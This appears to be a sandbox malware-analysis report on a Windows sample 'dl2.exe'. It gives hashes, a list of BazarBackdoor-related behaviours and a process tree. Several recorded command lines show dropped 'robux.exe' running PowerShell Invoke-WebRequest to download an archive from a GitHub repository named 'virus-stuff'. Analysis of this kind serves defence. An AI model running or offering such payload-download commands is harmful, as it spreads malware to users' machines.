Resubmissions
01-11-2024 12:33
241101-pradyaypdv 1027-10-2024 23:08
241027-24hmasskhj 1020-10-2024 16:28
241020-tyzdvsxgqb 320-10-2024 16:26
241020-tx2gtszekk 302-10-2024 11:53
241002-n2j6fsycqb 313-09-2024 04:59
240913-fmwxpswcpb 311-09-2024 15:54
240911-tcmg6sygmm 311-09-2024 15:53
240911-tbsmsszbnh 1025-08-2024 22:53
240825-2t6als1gll 10Analysis
-
max time kernel
459s -
max time network
575s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
17-08-2024 17:48
Errors
Reason
Machine shutdown
General
-
Target
dl2.exe
-
Size
849KB
-
MD5
c2055b7fbaa041d9f68b9d5df9b45edd
-
SHA1
e4bd443bd4ce9029290dcd4bb47cb1a01f3b1b06
-
SHA256
342f04c4720590c40d24078d46d9b19d8175565f0af460598171d58f5ffc48f3
-
SHA512
18905b75938b8af9468b1aa3ffbae796a139c2762e623aa6ffb9ec2b293dd04aa1f90d1ed5a7dbda7853795a3688e368121a134c7f63e527a8e5e7679301a1dc
-
SSDEEP
12288:A3RY3yNqMRTF4q2rxHn2ot/81xpNQyjUXlmoe7ufjHAtjXD7r2:A3RY3R24q+xn/8Xp2yOl5fzQ/2
Score
10/10
Malware Config
Signatures
-
BazarBackdoor 64 IoCs
Stealthy backdoor targeting corporate networks, believed to be developed by Trickbot's authors.
-
Blocklisted process makes network request 8 IoCs
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
-
Downloads MZ/PE file
-
Possible privilege escalation attempt 64 IoCs
-
Tries to connect to .bazar domain 64 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 30 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Power Settings 1 TTPs 9 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 3 IoCs
-
Drops file in Windows directory 64 IoCs
-
Access Token Manipulation: Create Process with Token 1 TTPs 3 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Program crash 3 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 48 IoCs
-
Suspicious use of SetWindowsHookEx 38 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\dl2.exe"C:\Users\Admin\AppData\Local\Temp\dl2.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\dl2.exeC:\Users\Admin\AppData\Local\Temp\dl2.exe {78492A41-D42E-4E61-A19C-A87FBA123BD8}1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- BazarBackdoor
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd7c4d46f8,0x7ffd7c4d4708,0x7ffd7c4d47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5096 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4372 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5560 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5540 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\robux.exe"C:\Users\Admin\Downloads\robux.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9035.tmp\9036.tmp\9037.bat C:\Users\Admin\Downloads\robux.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\Downloads\robux.exe"C:\Users\Admin\Downloads\robux.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9083.tmp\9084.tmp\9095.bat C:\Users\Admin\Downloads\robux.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6364 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1288 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6416 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6884 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7160 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\robux.exe"C:\Users\Admin\Downloads\robux.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61E3.tmp\61E4.tmp\61E5.bat C:\Users\Admin\Downloads\robux.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\Downloads\robux.exe"C:\Users\Admin\Downloads\robux.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9EDC.tmp\9EDD.tmp\9EEE.bat C:\Users\Admin\Downloads\robux.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15699298393752782347,10094872477449104883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:12⤵
-
-
